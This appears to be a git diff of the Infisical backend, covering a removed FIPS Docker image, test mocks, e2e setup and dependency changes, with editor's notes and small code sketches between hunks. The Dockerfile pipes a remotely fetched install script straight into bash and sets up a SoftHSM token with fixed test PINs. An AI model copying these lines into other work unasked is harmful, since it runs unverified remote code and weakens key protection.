RUN apt-get update && apt-get install -y \
build-essential \
autoconf \
automake \
git \
libtool \
libssl-dev \
python3 \
make \
g++ \
openssh-client \
curl \
pkg-config \
perl \
wget
# Install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apt-get install -y \
unixodbc \
unixodbc-dev \
freetds-dev \
freetds-bin \
tdsodbc
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
# Build and install SoftHSM2
RUN git clone https://github.com/opendnssec/SoftHSMv2.git ${SOFTHSM2_SOURCES}
WORKDIR ${SOFTHSM2_SOURCES}
RUN git checkout ${SOFTHSM2_VERSION} -b ${SOFTHSM2_VERSION} \
&& sh autogen.sh \
&& ./configure --prefix=/usr/local --disable-gost \
&& make \
&& make install
WORKDIR /root
RUN rm -fr ${SOFTHSM2_SOURCES}
# Install pkcs11-tool
RUN apt-get install -y opensc
RUN mkdir -p /etc/softhsm2/tokens && \
softhsm2-util --init-token --slot 0 --label "auth-app" --pin 1234 --so-pin 0000
WORKDIR /openssl-build
RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
&& tar -xf openssl-3.1.2.tar.gz \
&& cd openssl-3.1.2 \
&& ./Configure enable-fips \
&& make \
&& make install_fips \
&& cd / \
&& rm -rf /openssl-build \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
# ? App setup
# Install Infisical CLI
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
apt-get update && \
apt-get install -y infisical=0.41.89
WORKDIR /app
COPY package.json package.json
COPY package-lock.json package-lock.json
RUN npm install
COPY . .
ENV HOST=0.0.0.0
ENV OPENSSL_CONF=/app/nodejs.fips.cnf
ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
# ENV NODE_OPTIONS=--force-fips # Note(Daniel): We can't set this on the node options because it may break for existing folks using the infisical/infisical-fips image. Instead we call crypto.setFips(true) at runtime.
ENV FIPS_ENABLED=true
CMD ["npm", "run", "dev:docker"]
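
Editor's note: this deleted FIPS image builds OpenSSL 3.1.2 with the FIPS provider and points Node at nodejs.fips.cnf, but deliberately avoids --force-fips; per the Note(Daniel) comment, FIPS is toggled at runtime instead. A minimal sketch of that runtime toggle, assuming only the standard node:crypto API:

import crypto from "node:crypto";

// FIPS_ENABLED is set by the image above; setFips(true) only succeeds when the
// FIPS provider referenced by OPENSSL_CONF / OPENSSL_MODULES can actually be loaded.
if (process.env.FIPS_ENABLED === "true") {
  crypto.setFips(true);
  console.log("FIPS mode active:", Boolean(crypto.getFips()));
}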

View File

@@ -1,22 +1,14 @@
import RE2 from "re2";
import { TKeyStoreFactory } from "@app/keystore/keystore";
import { applyJitter } from "@app/lib/dates";
import { delay as delayMs } from "@app/lib/delay";
import { Lock } from "@app/lib/red-lock";
export const mockKeyStore = (): TKeyStoreFactory => {
const store: Record<string, string | number | Buffer> = {};
const getRegex = (pattern: string) =>
new RE2(`^${pattern.replace(/[-[\]/{}()+?.\\^$|]/g, "\\$&").replace(/\*/g, ".*")}$`);
return {
setItem: async (key, value) => {
store[key] = value;
return "OK";
},
setExpiry: async () => 0,
setItemWithExpiry: async (key, value) => {
store[key] = value;
return "OK";
@@ -25,27 +17,6 @@ export const mockKeyStore = (): TKeyStoreFactory => {
delete store[key];
return 1;
},
deleteItems: async ({ pattern, batchSize = 500, delay = 1500, jitter = 200 }) => {
const regex = getRegex(pattern);
let totalDeleted = 0;
const keys = Object.keys(store);
for (let i = 0; i < keys.length; i += batchSize) {
const batch = keys.slice(i, i + batchSize);
for (const key of batch) {
if (regex.test(key)) {
delete store[key];
totalDeleted += 1;
}
}
// eslint-disable-next-line no-await-in-loop
await delayMs(Math.max(0, applyJitter(delay, jitter)));
}
return totalDeleted;
},
getItem: async (key) => {
const value = store[key];
if (typeof value === "string") {
@@ -56,27 +27,6 @@ export const mockKeyStore = (): TKeyStoreFactory => {
incrementBy: async () => {
return 1;
},
getItems: async (keys) => {
const values = keys.map((key) => {
const value = store[key];
if (typeof value === "string") {
return value;
}
return null;
});
return values;
},
getKeysByPattern: async (pattern) => {
const regex = getRegex(pattern);
const keys = Object.keys(store);
return keys.filter((key) => regex.test(key));
},
deleteItemsByKeyIn: async (keys) => {
for (const key of keys) {
delete store[key];
}
return keys.length;
},
acquireLock: () => {
return Promise.resolve({
release: () => {}

View File

@@ -11,7 +11,6 @@ export const mockQueue = (): TQueueServiceFactory => {
job[name] = jobData;
},
queuePg: async () => {},
schedulePg: async () => {},
initialize: async () => {},
shutdown: async () => undefined,
stopRepeatableJob: async () => true,
@@ -24,10 +23,8 @@ export const mockQueue = (): TQueueServiceFactory => {
events[name] = event;
},
getRepeatableJobs: async () => [],
getDelayedJobs: async () => [],
clearQueue: async () => {},
stopJobById: async () => {},
stopJobByIdPg: async () => {},
stopRepeatableJobByJobId: async () => true,
stopRepeatableJobByKey: async () => true
};
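
Editor's note: this hunk trims the queue mock back to an older surface (the pg-boss-era entries such as queuePg, schedulePg, getDelayedJobs, and stopJobByIdPg appear on only one side). The underlying pattern is simple: record whatever gets enqueued so tests can assert on it without Redis or pg-boss. A self-contained sketch of that pattern, not the repo's exact types:

type JobPayload = Record<string, unknown>;

const makeRecordingQueue = () => {
  const jobs: Record<string, JobPayload> = {};
  return {
    // mirrors the queue(name, jobData) shape used by the mock above
    queue: async (name: string, jobData: JobPayload) => {
      jobs[name] = jobData;
    },
    inspect: () => ({ ...jobs })
  };
};

const demo = async () => {
  const q = makeRecordingQueue();
  await q.queue("secret-rotation", { rotationId: "example-id" });
  console.log(q.inspect()); // { "secret-rotation": { rotationId: "example-id" } }
};

void demo();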

View File

@@ -1,9 +1,8 @@
import crypto from "node:crypto";
import { SecretType, TSecrets } from "@app/db/schemas";
import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
import { initEnvConfig } from "@app/lib/config/env";
import { SymmetricKeySize } from "@app/lib/crypto";
import { crypto } from "@app/lib/crypto/cryptography";
import { initLogger, logger } from "@app/lib/logger";
import { decryptAsymmetric, decryptSymmetric128BitHexKeyUTF8, encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
const createServiceToken = async (
scopes: { environment: string; secretPath: string }[],
@@ -27,8 +26,7 @@ const createServiceToken = async (
});
const { user: userInfo } = JSON.parse(userInfoRes.payload);
const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
const projectKey = crypto.encryption().asymmetric().decrypt({
const projectKey = decryptAsymmetric({
ciphertext: projectKeyEnc.encryptedKey,
nonce: projectKeyEnc.nonce,
publicKey: projectKeyEnc.sender.publicKey,
@@ -36,13 +34,7 @@ const createServiceToken = async (
});
const randomBytes = crypto.randomBytes(16).toString("hex");
const { ciphertext, iv, tag } = crypto.encryption().symmetric().encrypt({
plaintext: projectKey,
key: randomBytes,
keySize: SymmetricKeySize.Bits128
});
const { ciphertext, iv, tag } = encryptSymmetric128BitHexKeyUTF8(projectKey, randomBytes);
const serviceTokenRes = await testServer.inject({
method: "POST",
url: "/api/v2/service-token",
@@ -145,9 +137,6 @@ describe("Service token secret ops", async () => {
let projectKey = "";
let folderId = "";
beforeAll(async () => {
initLogger();
await initEnvConfig(testSuperAdminDAL, logger);
serviceToken = await createServiceToken(
[{ secretPath: "/**", environment: seedData1.environment.slug }],
["read", "write"]
@@ -164,13 +153,11 @@ describe("Service token secret ops", async () => {
expect(serviceTokenInfoRes.statusCode).toBe(200);
const serviceTokenInfo = serviceTokenInfoRes.json();
const serviceTokenParts = serviceToken.split(".");
projectKey = crypto.encryption().symmetric().decrypt({
projectKey = decryptSymmetric128BitHexKeyUTF8({
key: serviceTokenParts[3],
tag: serviceTokenInfo.tag,
ciphertext: serviceTokenInfo.encryptedKey,
iv: serviceTokenInfo.iv,
keySize: SymmetricKeySize.Bits128
iv: serviceTokenInfo.iv
});
// create a deep folder
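
Editor's note: both sides of this hunk do the same work with different APIs: decrypt the project key with the user's key pair, then wrap it under a fresh 128-bit hex key embedded in the service token. As a rough illustration of the symmetric half only (the repo's real helpers live in @app/lib/crypto and may differ in encoding details), an AES-128-GCM round trip with a 32-hex-character key looks like this:

import crypto from "node:crypto";

// Illustration only: 128-bit key encoded as 32 hex characters, returning the same
// { ciphertext, iv, tag } shape the test above passes around.
const key = crypto.randomBytes(16).toString("hex");

const encrypt = (plaintext: string) => {
  const iv = crypto.randomBytes(12);
  const cipher = crypto.createCipheriv("aes-128-gcm", Buffer.from(key, "hex"), iv);
  const ciphertext = Buffer.concat([cipher.update(plaintext, "utf8"), cipher.final()]);
  return {
    ciphertext: ciphertext.toString("base64"),
    iv: iv.toString("base64"),
    tag: cipher.getAuthTag().toString("base64")
  };
};

const decrypt = ({ ciphertext, iv, tag }: { ciphertext: string; iv: string; tag: string }) => {
  const decipher = crypto.createDecipheriv("aes-128-gcm", Buffer.from(key, "hex"), Buffer.from(iv, "base64"));
  decipher.setAuthTag(Buffer.from(tag, "base64"));
  return Buffer.concat([decipher.update(Buffer.from(ciphertext, "base64")), decipher.final()]).toString("utf8");
};

console.log(decrypt(encrypt("project-key-material")) === "project-key-material"); // true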

View File

@@ -1,8 +1,6 @@
import { SecretType, TSecrets } from "@app/db/schemas";
import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
import { initEnvConfig } from "@app/lib/config/env";
import { crypto } from "@app/lib/crypto/cryptography";
import { initLogger, logger } from "@app/lib/logger";
import { decryptAsymmetric, encryptAsymmetric } from "@app/lib/crypto";
import { AuthMode } from "@app/services/auth/auth-type";
const createSecret = async (dto: {
@@ -157,9 +155,6 @@ describe("Secret V3 Router", async () => {
let projectKey = "";
let folderId = "";
beforeAll(async () => {
initLogger();
await initEnvConfig(testSuperAdminDAL, logger);
const projectKeyRes = await testServer.inject({
method: "GET",
url: `/api/v2/workspace/${seedData1.project.id}/encrypted-key`,
@@ -178,7 +173,7 @@ describe("Secret V3 Router", async () => {
});
const { user: userInfo } = JSON.parse(userInfoRes.payload);
const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
projectKey = crypto.encryption().asymmetric().decrypt({
projectKey = decryptAsymmetric({
ciphertext: projectKeyEncryptionDetails.encryptedKey,
nonce: projectKeyEncryptionDetails.nonce,
publicKey: projectKeyEncryptionDetails.sender.publicKey,
@@ -674,7 +669,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
const { user: userInfo } = JSON.parse(userInfoRes.payload);
const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
const projectKey = crypto.encryption().asymmetric().decrypt({
const projectKey = decryptAsymmetric({
ciphertext: projectKeyEnc.encryptedKey,
nonce: projectKeyEnc.nonce,
publicKey: projectKeyEnc.sender.publicKey,
@@ -690,7 +685,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
});
expect(projectBotRes.statusCode).toEqual(200);
const projectBot = JSON.parse(projectBotRes.payload).bot;
const botKey = crypto.encryption().asymmetric().encrypt(projectKey, projectBot.publicKey, privateKey);
const botKey = encryptAsymmetric(projectKey, projectBot.publicKey, privateKey);
// set bot as active
const setBotActive = await testServer.inject({

View File

@@ -2,11 +2,11 @@
import "ts-node/register";
import dotenv from "dotenv";
import { crypto } from "@app/lib/crypto/cryptography";
import jwt from "jsonwebtoken";
import path from "path";
import { seedData1 } from "@app/db/seed-data";
import { getDatabaseCredentials, initEnvConfig } from "@app/lib/config/env";
import { initEnvConfig } from "@app/lib/config/env";
import { initLogger } from "@app/lib/logger";
import { main } from "@app/server/app";
import { AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
@@ -15,9 +15,8 @@ import { mockSmtpServer } from "./mocks/smtp";
import { initDbConnection } from "@app/db";
import { queueServiceFactory } from "@app/queue";
import { keyStoreFactory } from "@app/keystore/keystore";
import { Redis } from "ioredis";
import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns";
import { buildRedisFromConfig } from "@app/lib/config/redis";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
dotenv.config({ path: path.join(__dirname, "../../.env.test"), debug: true });
export default {
@@ -25,17 +24,13 @@ export default {
transformMode: "ssr",
async setup() {
const logger = initLogger();
const databaseCredentials = getDatabaseCredentials(logger);
const envConfig = initEnvConfig(logger);
const db = initDbConnection({
dbConnectionUri: databaseCredentials.dbConnectionUri,
dbRootCert: databaseCredentials.dbRootCert
dbConnectionUri: envConfig.DB_CONNECTION_URI,
dbRootCert: envConfig.DB_ROOT_CERT
});
const superAdminDAL = superAdminDALFactory(db);
const envCfg = await initEnvConfig(superAdminDAL, logger);
const redis = buildRedisFromConfig(envCfg);
const redis = new Redis(envConfig.REDIS_URL);
await redis.flushdb("SYNC");
try {
@@ -60,10 +55,10 @@ export default {
});
const smtp = mockSmtpServer();
const queue = queueServiceFactory(envCfg, { dbConnectionUrl: envCfg.DB_CONNECTION_URI });
const keyStore = keyStoreFactory(envCfg);
const queue = queueServiceFactory(envConfig.REDIS_URL, { dbConnectionUrl: envConfig.DB_CONNECTION_URI });
const keyStore = keyStoreFactory(envConfig.REDIS_URL);
const hsmModule = initializeHsmModule(envCfg);
const hsmModule = initializeHsmModule(envConfig);
hsmModule.initialize();
const server = await main({
@@ -73,17 +68,14 @@ export default {
queue,
keyStore,
hsmModule: hsmModule.getModule(),
superAdminDAL,
redis,
envConfig: envCfg
envConfig
});
// @ts-expect-error type
globalThis.testServer = server;
// @ts-expect-error type
globalThis.testSuperAdminDAL = superAdminDAL;
// @ts-expect-error type
globalThis.jwtAuthToken = crypto.jwt().sign(
globalThis.jwtAuthToken = jwt.sign(
{
authTokenType: AuthTokenType.ACCESS_TOKEN,
userId: seedData1.id,
@@ -92,8 +84,8 @@ export default {
organizationId: seedData1.organization.id,
accessVersion: 1
},
envCfg.AUTH_SECRET,
{ expiresIn: envCfg.JWT_AUTH_LIFETIME }
envConfig.AUTH_SECRET,
{ expiresIn: envConfig.JWT_AUTH_LIFETIME }
);
} catch (error) {
// eslint-disable-next-line
@@ -110,8 +102,6 @@ export default {
// @ts-expect-error type
delete globalThis.testServer;
// @ts-expect-error type
delete globalThis.testSuperAdminDAL;
// @ts-expect-error type
delete globalThis.jwtToken;
// called after all tests with this env have been run
await db.migrate.rollback(
@@ -130,3 +120,4 @@ export default {
};
}
};
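
Editor's note: the test bootstrap above signs a JWT for the seeded user so e2e requests can authenticate without going through login. A minimal sketch of that signing step with jsonwebtoken; the claim values and lifetime below are placeholders standing in for the seed data and env config:

import jwt from "jsonwebtoken";

const secret = process.env.AUTH_SECRET ?? "test-only-secret";

// Claim names mirror the bootstrap above; the values are placeholders.
const token = jwt.sign(
  {
    authTokenType: "accessToken",
    userId: "seed-user-id",
    organizationId: "seed-org-id",
    accessVersion: 1
  },
  secret,
  { expiresIn: "1d" }
);

console.log(jwt.verify(token, secret));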

View File

@@ -1,16 +0,0 @@
nodejs_conf = nodejs_init
.include /usr/local/ssl/fipsmodule.cnf
[nodejs_init]
providers = provider_sect
[provider_sect]
default = default_sect
fips = fips_sect
[default_sect]
activate = 1
[algorithm_sect]
default_properties = fips=yes

backend/package-lock.json (generated, 12059 changes) — file diff suppressed because it is too large.

View File

@@ -38,9 +38,8 @@
"build:frontend": "npm run build --prefix ../frontend",
"start": "node --enable-source-maps dist/main.mjs",
"type:check": "tsc --noEmit",
"lint:fix": "node --max-old-space-size=8192 ./node_modules/.bin/eslint --fix --ext js,ts ./src",
"lint": "node --max-old-space-size=8192 ./node_modules/.bin/eslint 'src/**/*.ts'",
"test:unit": "vitest run -c vitest.unit.config.ts",
"lint:fix": "eslint --fix --ext js,ts ./src",
"lint": "eslint 'src/**/*.ts'",
"test:e2e": "vitest run -c vitest.e2e.config.ts --bail=1",
"test:e2e-watch": "vitest -c vitest.e2e.config.ts --bail=1",
"test:e2e-coverage": "vitest run --coverage -c vitest.e2e.config.ts",
@@ -61,19 +60,10 @@
"migration:status": "npm run auditlog-migration:status && knex --knexfile ./dist/db/knexfile.mjs --client pg migrate:status",
"migration:rollback": "npm run auditlog-migration:rollback && knex --knexfile ./dist/db/knexfile.mjs migrate:rollback",
"migration:unlock": "npm run auditlog-migration:unlock && knex --knexfile ./dist/db/knexfile.mjs migrate:unlock",
"migration:up-dev": "knex --knexfile ./src/db/knexfile.ts --client pg migrate:up",
"migration:down-dev": "knex --knexfile ./src/db/knexfile.ts --client pg migrate:down",
"migration:list-dev": "knex --knexfile ./src/db/knexfile.ts --client pg migrate:list",
"migration:latest-dev": "knex --knexfile ./src/db/knexfile.ts --client pg migrate:latest",
"migration:status-dev": "knex --knexfile ./src/db/knexfile.ts --client pg migrate:status",
"migration:rollback-dev": "knex --knexfile ./src/db/knexfile.ts migrate:rollback",
"migration:unlock-dev": "knex --knexfile ./src/db/knexfile.ts migrate:unlock",
"migrate:org": "tsx ./scripts/migrate-organization.ts",
"seed:new": "tsx ./scripts/create-seed-file.ts",
"seed": "knex --knexfile ./dist/db/knexfile.ts --client pg seed:run",
"seed-dev": "knex --knexfile ./src/db/knexfile.ts --client pg seed:run",
"db:reset": "npm run migration:rollback -- --all && npm run migration:latest",
"email:dev": "email dev --dir src/services/smtp/emails"
"db:reset": "npm run migration:rollback -- --all && npm run migration:latest"
},
"keywords": [],
"author": "",
@@ -84,21 +74,20 @@
"@babel/plugin-syntax-import-attributes": "^7.24.7",
"@babel/preset-env": "^7.18.10",
"@babel/preset-react": "^7.24.7",
"@smithy/types": "^4.3.1",
"@types/bcrypt": "^5.0.2",
"@types/jmespath": "^0.15.2",
"@types/jsonwebtoken": "^9.0.5",
"@types/jsrp": "^0.2.6",
"@types/libsodium-wrappers": "^0.7.13",
"@types/lodash.isequal": "^4.5.8",
"@types/node": "^20.17.30",
"@types/node": "^20.9.5",
"@types/nodemailer": "^6.4.14",
"@types/passport-github": "^1.1.12",
"@types/passport-google-oauth20": "^2.0.14",
"@types/pg": "^8.10.9",
"@types/picomatch": "^2.3.3",
"@types/pkcs11js": "^1.0.4",
"@types/prompt-sync": "^4.2.3",
"@types/react": "^19.1.2",
"@types/resolve": "^1.20.6",
"@types/safe-regex": "^1.1.6",
"@types/sjcl": "^1.0.34",
@@ -118,7 +107,6 @@
"nodemon": "^3.0.2",
"pino-pretty": "^10.2.3",
"prompt-sync": "^4.2.0",
"react-email": "4.0.7",
"rimraf": "^5.0.5",
"ts-node": "^10.9.2",
"tsc-alias": "^1.8.8",
@@ -132,7 +120,6 @@
"@aws-sdk/client-elasticache": "^3.637.0",
"@aws-sdk/client-iam": "^3.525.0",
"@aws-sdk/client-kms": "^3.609.0",
"@aws-sdk/client-route-53": "^3.810.0",
"@aws-sdk/client-secrets-manager": "^3.504.0",
"@aws-sdk/client-sts": "^3.600.0",
"@casl/ability": "^6.5.0",
@@ -150,46 +137,38 @@
"@fastify/static": "^7.0.4",
"@fastify/swagger": "^8.14.0",
"@fastify/swagger-ui": "^2.1.0",
"@gitbeaker/rest": "^42.5.0",
"@google-cloud/kms": "^4.5.0",
"@infisical/quic": "^1.0.8",
"@node-saml/passport-saml": "^5.1.0",
"@octokit/auth-app": "^7.1.1",
"@octokit/core": "^5.2.1",
"@octokit/plugin-paginate-graphql": "^4.0.1",
"@octokit/plugin-retry": "^5.0.5",
"@octokit/rest": "^20.0.2",
"@node-saml/passport-saml": "^4.0.4",
"@octokit/auth-app": "^7.1.5",
"@octokit/plugin-retry": "^7.1.4",
"@octokit/rest": "^21.1.1",
"@octokit/webhooks-types": "^7.3.1",
"@octopusdeploy/api-client": "^3.4.1",
"@opentelemetry/api": "^1.9.0",
"@opentelemetry/auto-instrumentations-node": "^0.53.0",
"@opentelemetry/exporter-metrics-otlp-proto": "^0.55.0",
"@opentelemetry/exporter-prometheus": "^0.55.0",
"@opentelemetry/instrumentation": "^0.55.0",
"@opentelemetry/instrumentation-http": "^0.57.2",
"@opentelemetry/resources": "^1.28.0",
"@opentelemetry/sdk-metrics": "^1.28.0",
"@opentelemetry/semantic-conventions": "^1.27.0",
"@peculiar/asn1-schema": "^2.3.8",
"@peculiar/x509": "^1.12.1",
"@react-email/components": "0.0.36",
"@serdnam/pino-cloudwatch-transport": "^1.0.4",
"@sindresorhus/slugify": "1.1.0",
"@slack/oauth": "^3.0.2",
"@slack/web-api": "^7.8.0",
"@ucast/mongo2js": "^1.3.4",
"acme-client": "^5.4.0",
"ajv": "^8.12.0",
"argon2": "^0.31.2",
"aws-sdk": "^2.1553.0",
"axios": "^1.11.0",
"axios": "^1.6.7",
"axios-retry": "^4.0.0",
"bcrypt": "^5.1.1",
"botbuilder": "^4.23.2",
"bullmq": "^5.4.2",
"cassandra-driver": "^4.7.2",
"connect-redis": "^7.1.1",
"cron": "^3.1.7",
"dd-trace": "^5.40.0",
"dotenv": "^16.4.1",
"fastify": "^4.28.1",
"fastify-plugin": "^4.5.1",
@@ -198,7 +177,6 @@
"handlebars": "^4.7.8",
"hdb": "^0.19.10",
"ioredis": "^5.3.2",
"isomorphic-dompurify": "^2.22.0",
"jmespath": "^0.16.0",
"jsonwebtoken": "^9.0.2",
"jsrp": "^0.2.4",
@@ -213,16 +191,16 @@
"mysql2": "^3.9.8",
"nanoid": "^3.3.8",
"nodemailer": "^6.9.9",
"oci-sdk": "^2.108.0",
"odbc": "^2.4.9",
"openai": "^4.85.4",
"openid-client": "^5.6.5",
"ora": "^7.0.1",
"oracledb": "^6.4.0",
"otplib": "^12.0.1",
"passport-github": "^1.1.0",
"passport-gitlab2": "^5.0.0",
"passport-google-oauth20": "^2.0.0",
"passport-ldapauth": "^3.0.1",
"passport-oauth2": "^1.8.0",
"pg": "^8.11.3",
"pg-boss": "^10.1.5",
"pg-query-stream": "^4.5.3",
@@ -232,9 +210,6 @@
"pkijs": "^3.2.4",
"posthog-node": "^3.6.2",
"probot": "^13.3.8",
"re2": "^1.21.4",
"react": "19.1.0",
"react-dom": "19.1.0",
"safe-regex": "^2.1.1",
"scim-patch": "^0.8.3",
"scim2-parse-filter": "^0.2.10",
@@ -246,6 +221,6 @@
"tweetnacl-util": "^0.15.1",
"uuid": "^9.0.1",
"zod": "^3.22.4",
"zod-to-json-schema": "^3.24.5"
"zod-to-json-schema": "^3.22.4"
}
}

View File

@@ -84,11 +84,6 @@ const getZodDefaultValue = (type: unknown, value: string | number | boolean | Ob
}
};
const bigIntegerColumns: Record<string, string[]> = {
"folder_commits": ["commitId"]
};
const main = async () => {
const tables = (
await db("information_schema.tables")
@@ -113,9 +108,6 @@ const main = async () => {
const columnName = columnNames[colNum];
const colInfo = columns[columnName];
let ztype = getZodPrimitiveType(colInfo.type);
if (bigIntegerColumns[tableName]?.includes(columnName)) {
ztype = "z.coerce.bigint()";
}
if (["zodBuffer"].includes(ztype)) {
zodImportSet.add(ztype);
}
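
Editor's note: one side of this hunk special-cases folder_commits.commitId so the generated schema uses z.coerce.bigint(). The motivation is that node-postgres returns BIGINT columns as strings to avoid precision loss, and coercion converts them back into native bigints. A small zod sketch:

import { z } from "zod";

// BIGINT values arrive from pg as strings; z.coerce.bigint() converts them safely.
const commitIdSchema = z.coerce.bigint();

console.log(commitIdSchema.parse("9007199254740993")); // 9007199254740993n
console.log(typeof commitIdSchema.parse("42"));        // "bigint"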

View File

@@ -0,0 +1,7 @@
import "@fastify/request-context";
declare module "@fastify/request-context" {
interface RequestContextData {
reqId: string;
}
}
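
Editor's note: this declaration file augments @fastify/request-context so reqId is a typed key. Once the augmentation is in place, any code holding the request context can read it type-safely; a minimal sketch (the logging helper is illustrative):

import { requestContext } from "@fastify/request-context";

// With the RequestContextData augmentation above, both the key and the value are type-checked.
export const logWithRequestId = (message: string): void => {
  const reqId = requestContext.get("reqId"); // string | undefined
  console.log(`[${reqId ?? "no-request"}] ${message}`);
};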

View File

@@ -2,7 +2,6 @@ import { FastifyInstance, RawReplyDefaultExpression, RawRequestDefaultExpression
import { CustomLogger } from "@app/lib/logger/logger";
import { ZodTypeProvider } from "@app/server/plugins/fastify-zod";
import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
declare global {
type FastifyZodProvider = FastifyInstance<
@@ -15,6 +14,5 @@ declare global {
// used only for testing
const testServer: FastifyZodProvider;
const testSuperAdminDAL: TSuperAdminDALFactory;
const jwtAuthToken: string;
}

View File

@@ -3,18 +3,16 @@ import "fastify";
import { Redis } from "ioredis";
import { TUsers } from "@app/db/schemas";
import { TAccessApprovalPolicyServiceFactory } from "@app/ee/services/access-approval-policy/access-approval-policy-types";
import { TAccessApprovalRequestServiceFactory } from "@app/ee/services/access-approval-request/access-approval-request-types";
import { TAssumePrivilegeServiceFactory } from "@app/ee/services/assume-privilege/assume-privilege-types";
import { TAuditLogServiceFactory, TCreateAuditLogDTO } from "@app/ee/services/audit-log/audit-log-types";
import { TAuditLogStreamServiceFactory } from "@app/ee/services/audit-log-stream/audit-log-stream-types";
import { TCertificateAuthorityCrlServiceFactory } from "@app/ee/services/certificate-authority-crl/certificate-authority-crl-types";
import { TAccessApprovalPolicyServiceFactory } from "@app/ee/services/access-approval-policy/access-approval-policy-service";
import { TAccessApprovalRequestServiceFactory } from "@app/ee/services/access-approval-request/access-approval-request-service";
import { TAuditLogServiceFactory } from "@app/ee/services/audit-log/audit-log-service";
import { TCreateAuditLogDTO } from "@app/ee/services/audit-log/audit-log-types";
import { TAuditLogStreamServiceFactory } from "@app/ee/services/audit-log-stream/audit-log-stream-service";
import { TCertificateAuthorityCrlServiceFactory } from "@app/ee/services/certificate-authority-crl/certificate-authority-crl-service";
import { TCertificateEstServiceFactory } from "@app/ee/services/certificate-est/certificate-est-service";
import { TDynamicSecretServiceFactory } from "@app/ee/services/dynamic-secret/dynamic-secret-types";
import { TDynamicSecretLeaseServiceFactory } from "@app/ee/services/dynamic-secret-lease/dynamic-secret-lease-types";
import { TDynamicSecretServiceFactory } from "@app/ee/services/dynamic-secret/dynamic-secret-service";
import { TDynamicSecretLeaseServiceFactory } from "@app/ee/services/dynamic-secret-lease/dynamic-secret-lease-service";
import { TExternalKmsServiceFactory } from "@app/ee/services/external-kms/external-kms-service";
import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service";
import { TGithubOrgSyncServiceFactory } from "@app/ee/services/github-org-sync/github-org-sync-service";
import { TGroupServiceFactory } from "@app/ee/services/group/group-service";
import { TIdentityProjectAdditionalPrivilegeServiceFactory } from "@app/ee/services/identity-project-additional-privilege/identity-project-additional-privilege-service";
import { TIdentityProjectAdditionalPrivilegeV2ServiceFactory } from "@app/ee/services/identity-project-additional-privilege-v2/identity-project-additional-privilege-v2-service";
@@ -24,25 +22,21 @@ import { TKmipServiceFactory } from "@app/ee/services/kmip/kmip-service";
import { TLdapConfigServiceFactory } from "@app/ee/services/ldap-config/ldap-config-service";
import { TLicenseServiceFactory } from "@app/ee/services/license/license-service";
import { TOidcConfigServiceFactory } from "@app/ee/services/oidc/oidc-config-service";
import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
import { TPitServiceFactory } from "@app/ee/services/pit/pit-service";
import { TProjectTemplateServiceFactory } from "@app/ee/services/project-template/project-template-types";
import { TProjectUserAdditionalPrivilegeServiceFactory } from "@app/ee/services/project-user-additional-privilege/project-user-additional-privilege-types";
import { RateLimitConfiguration, TRateLimitServiceFactory } from "@app/ee/services/rate-limit/rate-limit-types";
import { TSamlConfigServiceFactory } from "@app/ee/services/saml-config/saml-config-types";
import { TScimServiceFactory } from "@app/ee/services/scim/scim-types";
import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service";
import { TProjectTemplateServiceFactory } from "@app/ee/services/project-template/project-template-service";
import { TProjectUserAdditionalPrivilegeServiceFactory } from "@app/ee/services/project-user-additional-privilege/project-user-additional-privilege-service";
import { TRateLimitServiceFactory } from "@app/ee/services/rate-limit/rate-limit-service";
import { RateLimitConfiguration } from "@app/ee/services/rate-limit/rate-limit-types";
import { TSamlConfigServiceFactory } from "@app/ee/services/saml-config/saml-config-service";
import { TScimServiceFactory } from "@app/ee/services/scim/scim-service";
import { TSecretApprovalPolicyServiceFactory } from "@app/ee/services/secret-approval-policy/secret-approval-policy-service";
import { TSecretApprovalRequestServiceFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-service";
import { TSecretRotationServiceFactory } from "@app/ee/services/secret-rotation/secret-rotation-service";
import { TSecretRotationV2ServiceFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-service";
import { TSecretScanningServiceFactory } from "@app/ee/services/secret-scanning/secret-scanning-service";
import { TSecretScanningV2ServiceFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-service";
import { TSecretSnapshotServiceFactory } from "@app/ee/services/secret-snapshot/secret-snapshot-service";
import { TSshCertificateAuthorityServiceFactory } from "@app/ee/services/ssh/ssh-certificate-authority-service";
import { TSshCertificateTemplateServiceFactory } from "@app/ee/services/ssh-certificate-template/ssh-certificate-template-service";
import { TSshHostServiceFactory } from "@app/ee/services/ssh-host/ssh-host-service";
import { TSshHostGroupServiceFactory } from "@app/ee/services/ssh-host-group/ssh-host-group-service";
import { TTrustedIpServiceFactory } from "@app/ee/services/trusted-ip/trusted-ip-types";
import { TTrustedIpServiceFactory } from "@app/ee/services/trusted-ip/trusted-ip-service";
import { TAuthMode } from "@app/server/plugins/auth/inject-identity";
import { TApiKeyServiceFactory } from "@app/services/api-key/api-key-service";
import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service";
@@ -51,49 +45,39 @@ import { TAuthPasswordFactory } from "@app/services/auth/auth-password-service";
